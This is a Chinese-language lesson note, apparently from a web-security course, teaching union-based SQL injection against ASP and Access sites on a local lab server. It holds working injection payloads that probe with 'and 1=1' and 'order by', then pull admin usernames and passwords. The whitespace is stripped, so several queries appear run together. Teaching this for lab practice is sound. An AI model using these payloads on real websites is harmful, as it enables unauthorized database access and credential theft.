配色: 字号:
1_2
2016-07-24 | 阅:  转:  |  分享 
  
授课内容:第二课_SQL注入之access篇

搭建组合

操作系统:windowslinux

搭建平台:iisapacheuginxtomcat

脚本格式:aspphpaspxjspcgiwarpypldojs

数据库:accessmysqlmssqloracledb2postsql

脚本数据库搭建平台操作系统

1.asp+access+iis+windows

2.php+mysql+apache+linux

3.php+mysql+apache+windows

4.php+mysql+iis+windows

5.aspx+sqlserver+iis+windows

6.asp+sqlserver+iis+windows

7.jsp+oracle+uginx+linuxwindows

脚本编程与数据库结合代码分析注入原理

网站域名:http://127.0.0.1:81/0/0/

文件目录:Productio

网站文件:PRODUCT_DETAIL.asp

文件参数名:id

文件参数值:1513





http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513

sql="selectfromproductwhereid="&id

selectfromproductwhereid=1513and1=1



sql注入原理:网站文件参数传递中未进行过滤,从而导致的恶意sql语句执行的结果。













初识asp+accesssql注入漏洞(联合查询法)



判断注入

''and1=1and1=2

and1=1页面正常

and1=22页面错误

数学逻辑运算符或且非

orandxor

真且真真

真且假假

真或假真

http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513

selectfromproductwhereid=1513

http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513and1=1

selectfromproductwhereid=1513and1=1

http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513and1=22

selectfromproductwhereid=1513and1=22





猜字段:orderby22



2.猜解表名

unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22fromadmin





3.猜解列名

unionselect1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22fromadmin





4.猜解内容

http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513unionselect1,2,xxuser_name,4,5,6,7,8,9,10,11,12,13,14,xxpass_word,16,17,18,19,20,21,22fromadmin









分析注入中的产生条件

sql注入漏洞产生的条件:

1.是否有参数传递

2.是否参数带入数据库查询

3.是否sql语句被执行





几个例子+练习作业

搭建asp环境,搭建测试的源码

测试sql注入(asp+access)

3.尝试修改列名或表名再次猜解











总结:

问题1.access注入一定能猜解到表名或列名吗?

问题2.access注入表名或列名猜解不到怎么办?







www.xxx.com/ea_news.asp?id=1

www.xxx.com/ea_photo.asp?id=1



Ea_admin

献花(0)
+1
(本文系尼姑拉稀赵4...首藏)